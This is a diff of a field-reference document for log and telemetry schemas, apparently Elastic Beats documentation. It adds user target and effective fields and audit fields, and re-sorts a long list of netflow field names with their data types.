++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -46722,6 +47479,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -46838,6 +47708,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- @@ -47423,11 +48306,6 @@ example: 0 -- -[float] -=== audit - - - *`elasticsearch.audit.layer`*:: + @@ -47491,6 +48369,27 @@ example: ['kibana_admin', 'beats_admin'] -- +*`elasticsearch.audit.user.run_as.name`*:: ++ +-- +type: keyword + +-- + +*`elasticsearch.audit.user.run_as.realm`*:: ++ +-- +type: keyword + +-- + +*`elasticsearch.audit.component`*:: ++ +-- +type: keyword + +-- + *`elasticsearch.audit.action`*:: + -- @@ -47587,6 +48486,13 @@ type: text -- +*`elasticsearch.audit.invalidate.apikeys.owned_by_authenticated_user`*:: ++ +-- +type: boolean + +-- + [float] === deprecation @@ -86066,6 +86972,13 @@ type: object -- +*`logstash.log.log_event.action`*:: ++ +-- +type: keyword + +-- + *`logstash.log.pipeline_id`*:: + -- @@ -94407,434 +95320,427 @@ type: integer -- -*`netflow.octet_delta_count`*:: +*`netflow.absolute_error`*:: + -- -type: long +type: double -- -*`netflow.packet_delta_count`*:: +*`netflow.address_pool_high_threshold`*:: + -- type: long -- -*`netflow.delta_flow_count`*:: +*`netflow.address_pool_low_threshold`*:: + -- type: long -- -*`netflow.protocol_identifier`*:: +*`netflow.address_port_mapping_high_threshold`*:: + -- -type: short +type: long -- -*`netflow.ip_class_of_service`*:: +*`netflow.address_port_mapping_low_threshold`*:: + -- -type: short +type: long -- -*`netflow.tcp_control_bits`*:: +*`netflow.address_port_mapping_per_user_high_threshold`*:: + -- -type: integer +type: long -- -*`netflow.source_transport_port`*:: +*`netflow.afc_protocol`*:: + -- type: integer -- -*`netflow.source_ipv4_address`*:: +*`netflow.afc_protocol_name`*:: + -- -type: ip - --- - -*`netflow.source_ipv4_prefix_length`*:: -+ --- -type: short +type: keyword -- -*`netflow.ingress_interface`*:: +*`netflow.anonymization_flags`*:: + -- -type: long +type: integer -- -*`netflow.destination_transport_port`*:: +*`netflow.anonymization_technique`*:: + -- type: integer -- -*`netflow.destination_ipv4_address`*:: +*`netflow.application_business-relevance`*:: + -- -type: ip +type: long -- -*`netflow.destination_ipv4_prefix_length`*:: +*`netflow.application_category_name`*:: + -- -type: short +type: keyword -- -*`netflow.egress_interface`*:: +*`netflow.application_description`*:: + -- -type: long +type: keyword -- -*`netflow.ip_next_hop_ipv4_address`*:: +*`netflow.application_group_name`*:: + -- -type: ip +type: keyword -- -*`netflow.bgp_source_as_number`*:: +*`netflow.application_http_uri_statistics`*:: + -- -type: long +type: short -- -*`netflow.bgp_destination_as_number`*:: +*`netflow.application_http_user-agent`*:: + -- -type: long +type: short -- -*`netflow.bgp_next_hop_ipv4_address`*:: +*`netflow.application_id`*:: + -- -type: ip +type: short -- -*`netflow.post_mcast_packet_delta_count`*:: +*`netflow.application_name`*:: + -- -type: long +type: keyword -- -*`netflow.post_mcast_octet_delta_count`*:: +*`netflow.application_sub_category_name`*:: + -- -type: long +type: keyword -- -*`netflow.flow_end_sys_up_time`*:: +*`netflow.application_traffic-class`*:: + -- type: long -- -*`netflow.flow_start_sys_up_time`*:: +*`netflow.art_client_network_time_maximum`*:: + -- type: long -- -*`netflow.post_octet_delta_count`*:: +*`netflow.art_client_network_time_minimum`*:: + -- type: long -- -*`netflow.post_packet_delta_count`*:: +*`netflow.art_client_network_time_sum`*:: + -- type: long -- -*`netflow.minimum_ip_total_length`*:: +*`netflow.art_clientpackets`*:: + -- type: long -- -*`netflow.maximum_ip_total_length`*:: +*`netflow.art_count_late_responses`*:: + -- type: long -- -*`netflow.source_ipv6_address`*:: +*`netflow.art_count_new_connections`*:: + -- -type: ip +type: long -- -*`netflow.destination_ipv6_address`*:: +*`netflow.art_count_responses`*:: + -- -type: ip +type: long -- -*`netflow.source_ipv6_prefix_length`*:: +*`netflow.art_count_responses_histogram_bucket1`*:: + -- -type: short +type: long -- -*`netflow.destination_ipv6_prefix_length`*:: +*`netflow.art_count_responses_histogram_bucket2`*:: + -- -type: short +type: long -- -*`netflow.flow_label_ipv6`*:: +*`netflow.art_count_responses_histogram_bucket3`*:: + -- type: long -- -*`netflow.icmp_type_code_ipv4`*:: +*`netflow.art_count_responses_histogram_bucket4`*:: + -- -type: integer +type: long -- -*`netflow.igmp_type`*:: +*`netflow.art_count_responses_histogram_bucket5`*:: + -- -type: short +type: long -- -*`netflow.sampling_interval`*:: +*`netflow.art_count_responses_histogram_bucket6`*:: + -- type: long -- -*`netflow.sampling_algorithm`*:: +*`netflow.art_count_responses_histogram_bucket7`*:: + -- -type: short +type: long -- -*`netflow.flow_active_timeout`*:: +*`netflow.art_count_retransmissions`*:: + -- -type: integer +type: long -- -*`netflow.flow_idle_timeout`*:: +*`netflow.art_count_transactions`*:: + -- -type: integer +type: long -- -*`netflow.engine_type`*:: +*`netflow.art_network_time_maximum`*:: + -- -type: short +type: long -- -*`netflow.engine_id`*:: +*`netflow.art_network_time_minimum`*:: + -- -type: short +type: long -- -*`netflow.exported_octet_total_count`*:: +*`netflow.art_network_time_sum`*:: + -- type: long -- -*`netflow.exported_message_total_count`*:: +*`netflow.art_response_time_maximum`*:: + -- type: long -- -*`netflow.exported_flow_record_total_count`*:: +*`netflow.art_response_time_minimum`*:: + -- type: long -- -*`netflow.ipv4_router_sc`*:: +*`netflow.art_response_time_sum`*:: + -- -type: ip +type: long -- -*`netflow.source_ipv4_prefix`*:: +*`netflow.art_server_network_time_maximum`*:: + -- -type: ip +type: long -- -*`netflow.destination_ipv4_prefix`*:: +*`netflow.art_server_network_time_minimum`*:: + -- -type: ip +type: long -- -*`netflow.mpls_top_label_type`*:: +*`netflow.art_server_network_time_sum`*:: + -- -type: short +type: long -- -*`netflow.mpls_top_label_ipv4_address`*:: +*`netflow.art_server_response_time_maximum`*:: + -- -type: ip +type: long -- -*`netflow.sampler_id`*:: +*`netflow.art_server_response_time_minimum`*:: + -- -type: short +type: long -- -*`netflow.sampler_mode`*:: +*`netflow.art_server_response_time_sum`*:: + -- -type: short +type: long -- -*`netflow.sampler_random_interval`*:: +*`netflow.art_serverpackets`*:: + -- type: long -- -*`netflow.class_id`*:: +*`netflow.art_total_response_time_maximum`*:: + -- type: long -- -*`netflow.minimum_ttl`*:: +*`netflow.art_total_response_time_minimum`*:: + -- -type: short +type: long -- -*`netflow.maximum_ttl`*:: +*`netflow.art_total_response_time_sum`*:: + -- -type: short +type: long -- -*`netflow.fragment_identification`*:: +*`netflow.art_total_transaction_time_maximum`*:: + -- type: long -- -*`netflow.post_ip_class_of_service`*:: +*`netflow.art_total_transaction_time_minimum`*:: + -- -type: short +type: long -- -*`netflow.source_mac_address`*:: +*`netflow.art_total_transaction_time_sum`*:: + -- -type: keyword +type: long -- -*`netflow.post_destination_mac_address`*:: +*`netflow.assembled_fragment_count`*:: + -- -type: keyword +type: long -- -*`netflow.vlan_id`*:: +*`netflow.audit_counter`*:: + -- -type: integer +type: long -- -*`netflow.post_vlan_id`*:: +*`netflow.average_interarrival_time`*:: + -- -type: integer +type: long -- -*`netflow.ip_version`*:: +*`netflow.bgp_destination_as_number`*:: + -- -type: short +type: long -- -*`netflow.flow_direction`*:: +*`netflow.bgp_next_adjacent_as_number`*:: + -- -type: short +type: long -- -*`netflow.ip_next_hop_ipv6_address`*:: +*`netflow.bgp_next_hop_ipv4_address`*:: + -- type: ip @@ -94848,994 +95754,630 @@ type: ip -- -*`netflow.ipv6_extension_headers`*:: +*`netflow.bgp_prev_adjacent_as_number`*:: + -- type: long -- -*`netflow.mpls_top_label_stack_section`*:: +*`netflow.bgp_source_as_number`*:: + -- -type: short +type: long -- -*`netflow.mpls_label_stack_section2`*:: +*`netflow.bgp_validity_state`*:: + -- type: short -- -*`netflow.mpls_label_stack_section3`*:: +*`netflow.biflow_direction`*:: + -- type: short -- -*`netflow.mpls_label_stack_section4`*:: +*`netflow.bind_ipv4_address`*:: + -- -type: short +type: ip -- -*`netflow.mpls_label_stack_section5`*:: +*`netflow.bind_transport_port`*:: + -- -type: short +type: integer -- -*`netflow.mpls_label_stack_section6`*:: +*`netflow.class_id`*:: + -- -type: short +type: long -- -*`netflow.mpls_label_stack_section7`*:: +*`netflow.class_name`*:: + -- -type: short +type: keyword -- -*`netflow.mpls_label_stack_section8`*:: +*`netflow.classification_engine_id`*:: + -- type: short -- -*`netflow.mpls_label_stack_section9`*:: +*`netflow.collection_time_milliseconds`*:: + -- -type: short +type: date -- -*`netflow.mpls_label_stack_section10`*:: +*`netflow.collector_certificate`*:: + -- type: short -- -*`netflow.destination_mac_address`*:: -+ --- -type: keyword - --- - -*`netflow.post_source_mac_address`*:: -+ --- -type: keyword - --- - -*`netflow.interface_name`*:: +*`netflow.collector_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`netflow.interface_description`*:: +*`netflow.collector_ipv6_address`*:: + -- -type: keyword +type: ip -- -*`netflow.sampler_name`*:: +*`netflow.collector_transport_port`*:: + -- -type: keyword +type: integer -- -*`netflow.octet_total_count`*:: +*`netflow.common_properties_id`*:: + -- type: long -- -*`netflow.packet_total_count`*:: +*`netflow.confidence_level`*:: + -- -type: long +type: double -- -*`netflow.flags_and_sampler_id`*:: +*`netflow.conn_ipv4_address`*:: + -- -type: long +type: ip -- -*`netflow.fragment_offset`*:: +*`netflow.conn_transport_port`*:: + -- type: integer -- -*`netflow.forwarding_status`*:: -+ --- -type: short - --- - -*`netflow.mpls_vpn_route_distinguisher`*:: -+ --- -type: short - --- - -*`netflow.mpls_top_label_prefix_length`*:: -+ --- -type: short - --- - -*`netflow.src_traffic_index`*:: +*`netflow.connection_sum_duration_seconds`*:: + -- type: long -- -*`netflow.dst_traffic_index`*:: +*`netflow.connection_transaction_id`*:: + -- type: long -- -*`netflow.application_description`*:: -+ --- -type: keyword - --- - -*`netflow.application_id`*:: -+ --- -type: short - --- - -*`netflow.application_name`*:: -+ --- -type: keyword - --- - -*`netflow.post_ip_diff_serv_code_point`*:: -+ --- -type: short - --- - -*`netflow.multicast_replication_factor`*:: +*`netflow.conntrack_id`*:: + -- type: long -- -*`netflow.class_name`*:: +*`netflow.data_byte_count`*:: + -- -type: keyword +type: long -- -*`netflow.classification_engine_id`*:: +*`netflow.data_link_frame_section`*:: + -- type: short -- -*`netflow.layer2packet_section_offset`*:: +*`netflow.data_link_frame_size`*:: + -- type: integer -- -*`netflow.layer2packet_section_size`*:: +*`netflow.data_link_frame_type`*:: + -- type: integer -- -*`netflow.layer2packet_section_data`*:: -+ --- -type: short - --- - -*`netflow.bgp_next_adjacent_as_number`*:: +*`netflow.data_records_reliability`*:: + -- -type: long +type: boolean -- -*`netflow.bgp_prev_adjacent_as_number`*:: +*`netflow.delta_flow_count`*:: + -- type: long -- -*`netflow.exporter_ipv4_address`*:: +*`netflow.destination_ipv4_address`*:: + -- type: ip -- -*`netflow.exporter_ipv6_address`*:: +*`netflow.destination_ipv4_prefix`*:: + -- type: ip -- -*`netflow.dropped_octet_delta_count`*:: -+ --- -type: long - --- - -*`netflow.dropped_packet_delta_count`*:: +*`netflow.destination_ipv4_prefix_length`*:: + -- -type: long +type: short -- -*`netflow.dropped_octet_total_count`*:: +*`netflow.destination_ipv6_address`*:: + -- -type: long +type: ip -- -*`netflow.dropped_packet_total_count`*:: +*`netflow.destination_ipv6_prefix`*:: + -- -type: long +type: ip -- -*`netflow.flow_end_reason`*:: +*`netflow.destination_ipv6_prefix_length`*:: + -- type: short -- -*`netflow.common_properties_id`*:: -+ --- -type: long - --- - -*`netflow.observation_point_id`*:: +*`netflow.destination_mac_address`*:: + -- -type: long +type: keyword -- -*`netflow.icmp_type_code_ipv6`*:: +*`netflow.destination_transport_port`*:: + -- type: integer -- -*`netflow.mpls_top_label_ipv6_address`*:: -+ --- -type: ip - --- - -*`netflow.line_card_id`*:: +*`netflow.digest_hash_value`*:: + -- type: long -- -*`netflow.port_id`*:: +*`netflow.distinct_count_of_destination_ip_address`*:: + -- type: long -- -*`netflow.metering_process_id`*:: +*`netflow.distinct_count_of_destination_ipv4_address`*:: + -- type: long -- -*`netflow.exporting_process_id`*:: +*`netflow.distinct_count_of_destination_ipv6_address`*:: + -- type: long -- -*`netflow.template_id`*:: -+ --- -type: integer - --- - -*`netflow.wlan_channel_id`*:: -+ --- -type: short - --- - -*`netflow.wlan_ssid`*:: -+ --- -type: keyword - --- - -*`netflow.flow_id`*:: +*`netflow.distinct_count_of_source_ip_address`*:: + -- type: long -- -*`netflow.observation_domain_id`*:: +*`netflow.distinct_count_of_source_ipv4_address`*:: + -- type: long -- -*`netflow.flow_start_seconds`*:: -+ --- -type: date - --- - -*`netflow.flow_end_seconds`*:: -+ --- -type: date - --- - -*`netflow.flow_start_milliseconds`*:: -+ --- -type: date - --- - -*`netflow.flow_end_milliseconds`*:: -+ --- -type: date - --- - -*`netflow.flow_start_microseconds`*:: -+ --- -type: date - --- - -*`netflow.flow_end_microseconds`*:: -+ --- -type: date - --- - -*`netflow.flow_start_nanoseconds`*:: -+ --- -type: date - --- - -*`netflow.flow_end_nanoseconds`*:: -+ --- -type: date - --- - -*`netflow.flow_start_delta_microseconds`*:: +*`netflow.distinct_count_of_source_ipv6_address`*:: + -- type: long -- -*`netflow.flow_end_delta_microseconds`*:: +*`netflow.dns_authoritative`*:: + -- -type: long +type: short -- -*`netflow.system_init_time_milliseconds`*:: +*`netflow.dns_cname`*:: + -- -type: date +type: keyword -- -*`netflow.flow_duration_milliseconds`*:: +*`netflow.dns_id`*:: + -- -type: long +type: integer -- -*`netflow.flow_duration_microseconds`*:: +*`netflow.dns_mx_exchange`*:: + -- -type: long +type: keyword -- -*`netflow.observed_flow_total_count`*:: +*`netflow.dns_mx_preference`*:: + -- -type: long +type: integer -- -*`netflow.ignored_packet_total_count`*:: +*`netflow.dns_nsd_name`*:: + -- -type: long +type: keyword -- -*`netflow.ignored_octet_total_count`*:: +*`netflow.dns_nx_domain`*:: + -- -type: long +type: short -- -*`netflow.not_sent_flow_total_count`*:: +*`netflow.dns_ptrd_name`*:: + -- -type: long +type: keyword -- -*`netflow.not_sent_packet_total_count`*:: +*`netflow.dns_qname`*:: + -- -type: long +type: keyword -- -*`netflow.not_sent_octet_total_count`*:: +*`netflow.dns_qr_type`*:: + -- -type: long +type: integer -- -*`netflow.destination_ipv6_prefix`*:: +*`netflow.dns_query_response`*:: + -- -type: ip +type: short -- -*`netflow.source_ipv6_prefix`*:: +*`netflow.dns_rr_section`*:: + -- -type: ip +type: short -- -*`netflow.post_octet_total_count`*:: +*`netflow.dns_soa_expire`*:: + -- type: long -- -*`netflow.post_packet_total_count`*:: +*`netflow.dns_soa_minimum`*:: + -- type: long -- -*`netflow.flow_key_indicator`*:: +*`netflow.dns_soa_refresh`*:: + -- type: long -- -*`netflow.post_mcast_packet_total_count`*:: +*`netflow.dns_soa_retry`*:: + -- type: long -- -*`netflow.post_mcast_octet_total_count`*:: +*`netflow.dns_soa_serial`*:: + -- type: long -- -*`netflow.icmp_type_ipv4`*:: +*`netflow.dns_soam_name`*:: + -- -type: short - --- - -*`netflow.icmp_code_ipv4`*:: -+ --- -type: short - --- - -*`netflow.icmp_type_ipv6`*:: -+ --- -type: short +type: keyword -- -*`netflow.icmp_code_ipv6`*:: +*`netflow.dns_soar_name`*:: + -- -type: short +type: keyword -- -*`netflow.udp_source_port`*:: +*`netflow.dns_srv_port`*:: + -- type: integer -- -*`netflow.udp_destination_port`*:: +*`netflow.dns_srv_priority`*:: + -- type: integer -- -*`netflow.tcp_source_port`*:: +*`netflow.dns_srv_target`*:: + -- type: integer -- -*`netflow.tcp_destination_port`*:: +*`netflow.dns_srv_weight`*:: + -- type: integer -- -*`netflow.tcp_sequence_number`*:: +*`netflow.dns_ttl`*:: + -- type: long -- -*`netflow.tcp_acknowledgement_number`*:: +*`netflow.dns_txt_data`*:: + -- -type: long - --- - -*`netflow.tcp_window_size`*:: -+ --- -type: integer +type: keyword -- -*`netflow.tcp_urgent_pointer`*:: +*`netflow.dot1q_customer_dei`*:: + -- -type: integer +type: boolean -- -*`netflow.tcp_header_length`*:: +*`netflow.dot1q_customer_destination_mac_address`*:: + -- -type: short +type: keyword -- -*`netflow.ip_header_length`*:: +*`netflow.dot1q_customer_priority`*:: + -- type: short -- -*`netflow.total_length_ipv4`*:: +*`netflow.dot1q_customer_source_mac_address`*:: + -- -type: integer +type: keyword -- -*`netflow.payload_length_ipv6`*:: +*`netflow.dot1q_customer_vlan_id`*:: + -- type: integer -- -*`netflow.ip_ttl`*:: -+ --- -type: short - --- - -*`netflow.next_header_ipv6`*:: -+ --- -type: short - --- - -*`netflow.mpls_payload_length`*:: -+ --- -type: long - --- - -*`netflow.ip_diff_serv_code_point`*:: -+ --- -type: short - --- - -*`netflow.ip_precedence`*:: +*`netflow.dot1q_dei`*:: + -- -type: short +type: boolean -- -*`netflow.fragment_flags`*:: +*`netflow.dot1q_priority`*:: + -- type: short -- -*`netflow.octet_delta_sum_of_squares`*:: -+ --- -type: long - --- - -*`netflow.octet_total_sum_of_squares`*:: +*`netflow.dot1q_service_instance_id`*:: + -- type: long -- -*`netflow.mpls_top_label_ttl`*:: +*`netflow.dot1q_service_instance_priority`*:: + -- type: short -- -*`netflow.mpls_label_stack_length`*:: -+ --- -type: long - --- - -*`netflow.mpls_label_stack_depth`*:: -+ --- -type: long - --- - -*`netflow.mpls_top_label_exp`*:: +*`netflow.dot1q_service_instance_tag`*:: + -- type: short -- -*`netflow.ip_payload_length`*:: -+ --- -type: long - --- - -*`netflow.udp_message_length`*:: +*`netflow.dot1q_vlan_id`*:: + -- type: integer -- -*`netflow.is_multicast`*:: -+ --- -type: short - --- - -*`netflow.ipv4_ihl`*:: -+ --- -type: short - --- - -*`netflow.ipv4_options`*:: -+ --- -type: long - --- - -*`netflow.tcp_options`*:: +*`netflow.dropped_layer2_octet_delta_count`*:: + -- type: long -- -*`netflow.padding_octets`*:: -+ --- -type: short - --- - -*`netflow.collector_ipv4_address`*:: -+ --- -type: ip - --- - -*`netflow.collector_ipv6_address`*:: -+ --- -type: ip - --- - -*`netflow.export_interface`*:: +*`netflow.dropped_layer2_octet_total_count`*:: + -- type: long -- -*`netflow.export_protocol_version`*:: -+ --- -type: short - --- - -*`netflow.export_transport_protocol`*:: -+ --- -type: short - --- - -*`netflow.collector_transport_port`*:: -+ --- -type: integer - --- - -*`netflow.exporter_transport_port`*:: -+ --- -type: integer - --- - -*`netflow.tcp_syn_total_count`*:: +*`netflow.dropped_octet_delta_count`*:: + -- type: long -- -*`netflow.tcp_fin_total_count`*:: +*`netflow.dropped_octet_total_count`*:: + -- type: long -- -*`netflow.tcp_rst_total_count`*:: +*`netflow.dropped_packet_delta_count`*:: + -- type: long -- -*`netflow.tcp_psh_total_count`*:: +*`netflow.dropped_packet_total_count`*:: + -- type: long -- -*`netflow.tcp_ack_total_count`*:: +*`netflow.dst_traffic_index`*:: + -- type: long -- -*`netflow.tcp_urg_total_count`*:: +*`netflow.egress_broadcast_packet_total_count`*:: + -- type: long -- -*`netflow.ip_total_length`*:: +*`netflow.egress_interface`*:: + -- type: long -- -*`netflow.post_nat_source_ipv4_address`*:: -+ --- -type: ip - --- - -*`netflow.post_nat_destination_ipv4_address`*:: -+ --- -type: ip - --- - -*`netflow.post_napt_source_transport_port`*:: -+ --- -type: integer - --- - -*`netflow.post_napt_destination_transport_port`*:: -+ --- -type: integer - --- - -*`netflow.nat_originating_address_realm`*:: -+ --- -type: short - --- - -*`netflow.nat_event`*:: -+ --- -type: short - --- - -*`netflow.initiator_octets`*:: +*`netflow.egress_interface_type`*:: + -- type: long -- -*`netflow.responder_octets`*:: +*`netflow.egress_physical_interface`*:: + -- type: long -- -*`netflow.firewall_event`*:: -+ --- -type: short - --- - -*`netflow.ingress_vrfid`*:: +*`netflow.egress_unicast_packet_total_count`*:: + -- type: long @@ -95849,28 +96391,21 @@ type: long -- -*`netflow.vr_fname`*:: +*`netflow.encrypted_technology`*:: + -- type: keyword -- -*`netflow.post_mpls_top_label_exp`*:: +*`netflow.engine_id`*:: + -- type: short -- -*`netflow.tcp_window_scale`*:: -+ --- -type: integer - --- - -*`netflow.biflow_direction`*:: +*`netflow.engine_type`*:: + -- type: short @@ -95898,654 +96433,710 @@ type: integer -- -*`netflow.dot1q_vlan_id`*:: +*`netflow.ethernet_type`*:: + -- type: integer -- -*`netflow.dot1q_priority`*:: +*`netflow.expired_fragment_count`*:: + -- -type: short +type: long -- -*`netflow.dot1q_customer_vlan_id`*:: +*`netflow.export_interface`*:: + -- -type: integer +type: long -- -*`netflow.dot1q_customer_priority`*:: +*`netflow.export_protocol_version`*:: + -- type: short -- -*`netflow.metro_evc_id`*:: +*`netflow.export_sctp_stream_id`*:: + -- -type: keyword +type: integer -- -*`netflow.metro_evc_type`*:: +*`netflow.export_transport_protocol`*:: + -- type: short -- -*`netflow.pseudo_wire_id`*:: +*`netflow.exported_flow_record_total_count`*:: + -- type: long -- -*`netflow.pseudo_wire_type`*:: +*`netflow.exported_message_total_count`*:: + -- -type: integer +type: long -- -*`netflow.pseudo_wire_control_word`*:: +*`netflow.exported_octet_total_count`*:: + -- type: long -- -*`netflow.ingress_physical_interface`*:: +*`netflow.exporter_certificate`*:: + -- -type: long +type: short -- -*`netflow.egress_physical_interface`*:: +*`netflow.exporter_ipv4_address`*:: + -- -type: long +type: ip -- -*`netflow.post_dot1q_vlan_id`*:: +*`netflow.exporter_ipv6_address`*:: + -- -type: integer +type: ip -- -*`netflow.post_dot1q_customer_vlan_id`*:: +*`netflow.exporter_transport_port`*:: + -- type: integer -- -*`netflow.ethernet_type`*:: +*`netflow.exporting_process_id`*:: + -- -type: integer +type: long -- -*`netflow.post_ip_precedence`*:: +*`netflow.external_address_realm`*:: + -- type: short -- -*`netflow.collection_time_milliseconds`*:: +*`netflow.firewall_event`*:: + -- -type: date +type: short -- -*`netflow.export_sctp_stream_id`*:: +*`netflow.first_eight_non_empty_packet_directions`*:: ++ +-- +type: short + +-- + +*`netflow.first_non_empty_packet_size`*:: + -- type: integer -- -*`netflow.max_export_seconds`*:: +*`netflow.first_packet_banner`*:: + -- -type: date +type: keyword -- -*`netflow.max_flow_end_seconds`*:: +*`netflow.flags_and_sampler_id`*:: + -- -type: date +type: long -- -*`netflow.message_md5_checksum`*:: +*`netflow.flow_active_timeout`*:: + -- -type: short +type: integer -- -*`netflow.message_scope`*:: +*`netflow.flow_attributes`*:: + -- -type: short +type: integer -- -*`netflow.min_export_seconds`*:: +*`netflow.flow_direction`*:: + -- -type: date +type: short -- -*`netflow.min_flow_start_seconds`*:: +*`netflow.flow_duration_microseconds`*:: + -- -type: date +type: long -- -*`netflow.opaque_octets`*:: +*`netflow.flow_duration_milliseconds`*:: + -- -type: short +type: long -- -*`netflow.session_scope`*:: +*`netflow.flow_end_delta_microseconds`*:: + -- -type: short +type: long -- -*`netflow.max_flow_end_microseconds`*:: +*`netflow.flow_end_microseconds`*:: + -- type: date -- -*`netflow.max_flow_end_milliseconds`*:: +*`netflow.flow_end_milliseconds`*:: + -- type: date -- -*`netflow.max_flow_end_nanoseconds`*:: +*`netflow.flow_end_nanoseconds`*:: + -- type: date -- -*`netflow.min_flow_start_microseconds`*:: +*`netflow.flow_end_reason`*:: + -- -type: date +type: short -- -*`netflow.min_flow_start_milliseconds`*:: +*`netflow.flow_end_seconds`*:: + -- type: date -- -*`netflow.min_flow_start_nanoseconds`*:: +*`netflow.flow_end_sys_up_time`*:: + -- -type: date +type: long -- -*`netflow.collector_certificate`*:: +*`netflow.flow_id`*:: + -- -type: short +type: long -- -*`netflow.exporter_certificate`*:: +*`netflow.flow_idle_timeout`*:: + -- -type: short +type: integer -- -*`netflow.data_records_reliability`*:: +*`netflow.flow_key_indicator`*:: + -- -type: boolean +type: long -- -*`netflow.observation_point_type`*:: +*`netflow.flow_label_ipv6`*:: + -- -type: short +type: long -- -*`netflow.new_connection_delta_count`*:: +*`netflow.flow_sampling_time_interval`*:: + -- type: long -- -*`netflow.connection_sum_duration_seconds`*:: +*`netflow.flow_sampling_time_spacing`*:: + -- type: long -- -*`netflow.connection_transaction_id`*:: +*`netflow.flow_selected_flow_delta_count`*:: + -- type: long -- -*`netflow.post_nat_source_ipv6_address`*:: +*`netflow.flow_selected_octet_delta_count`*:: + -- -type: ip +type: long -- -*`netflow.post_nat_destination_ipv6_address`*:: +*`netflow.flow_selected_packet_delta_count`*:: + -- -type: ip +type: long -- -*`netflow.nat_pool_id`*:: +*`netflow.flow_selector_algorithm`*:: ++ +-- +type: integer + +-- + +*`netflow.flow_start_delta_microseconds`*:: + -- type: long -- -*`netflow.nat_pool_name`*:: +*`netflow.flow_start_microseconds`*:: + -- -type: keyword +type: date -- -*`netflow.anonymization_flags`*:: +*`netflow.flow_start_milliseconds`*:: + -- -type: integer +type: date -- -*`netflow.anonymization_technique`*:: +*`netflow.flow_start_nanoseconds`*:: + -- -type: integer +type: date -- -*`netflow.information_element_index`*:: +*`netflow.flow_start_seconds`*:: + -- -type: integer +type: date -- -*`netflow.p2p_technology`*:: +*`netflow.flow_start_sys_up_time`*:: + -- -type: keyword +type: long -- -*`netflow.tunnel_technology`*:: +*`netflow.flow_table_flush_event_count`*:: + -- -type: keyword +type: long -- -*`netflow.encrypted_technology`*:: +*`netflow.flow_table_peak_count`*:: + -- -type: keyword +type: long -- -*`netflow.bgp_validity_state`*:: +*`netflow.forwarding_status`*:: + -- type: short -- -*`netflow.ip_sec_spi`*:: +*`netflow.fragment_flags`*:: + -- -type: long +type: short -- -*`netflow.gre_key`*:: +*`netflow.fragment_identification`*:: + -- type: long -- -*`netflow.nat_type`*:: +*`netflow.fragment_offset`*:: + -- -type: short +type: integer -- -*`netflow.initiator_packets`*:: +*`netflow.fw_blackout_secs`*:: + -- type: long -- -*`netflow.responder_packets`*:: +*`netflow.fw_configured_value`*:: + -- type: long -- -*`netflow.observation_domain_name`*:: +*`netflow.fw_cts_src_sgt`*:: + -- -type: keyword +type: long -- -*`netflow.selection_sequence_id`*:: +*`netflow.fw_event_level`*:: + -- type: long -- -*`netflow.selector_id`*:: +*`netflow.fw_event_level_id`*:: + -- type: long -- -*`netflow.information_element_id`*:: +*`netflow.fw_ext_event`*:: + -- type: integer -- -*`netflow.selector_algorithm`*:: +*`netflow.fw_ext_event_alt`*:: + -- -type: integer +type: long -- -*`netflow.sampling_packet_interval`*:: +*`netflow.fw_ext_event_desc`*:: ++ +-- +type: keyword + +-- + +*`netflow.fw_half_open_count`*:: + -- type: long -- -*`netflow.sampling_packet_space`*:: +*`netflow.fw_half_open_high`*:: + -- type: long -- -*`netflow.sampling_time_interval`*:: +*`netflow.fw_half_open_rate`*:: + -- type: long -- -*`netflow.sampling_time_space`*:: +*`netflow.fw_max_sessions`*:: + -- type: long -- -*`netflow.sampling_size`*:: +*`netflow.fw_rule`*:: ++ +-- +type: keyword + +-- + +*`netflow.fw_summary_pkt_count`*:: + -- type: long -- -*`netflow.sampling_population`*:: +*`netflow.fw_zone_pair_id`*:: + -- type: long -- -*`netflow.sampling_probability`*:: +*`netflow.fw_zone_pair_name`*:: + -- -type: double +type: long -- -*`netflow.data_link_frame_size`*:: +*`netflow.global_address_mapping_high_threshold`*:: ++ +-- +type: long + +-- + +*`netflow.gre_key`*:: ++ +-- +type: long + +-- + +*`netflow.hash_digest_output`*:: ++ +-- +type: boolean + +-- + +*`netflow.hash_flow_domain`*:: + -- type: integer -- -*`netflow.ip_header_packet_section`*:: +*`netflow.hash_initialiser_value`*:: + -- -type: short +type: long -- -*`netflow.ip_payload_packet_section`*:: +*`netflow.hash_ip_payload_offset`*:: + -- -type: short +type: long -- -*`netflow.data_link_frame_section`*:: +*`netflow.hash_ip_payload_size`*:: + -- -type: short +type: long -- -*`netflow.mpls_label_stack_section`*:: +*`netflow.hash_output_range_max`*:: + -- -type: short +type: long -- 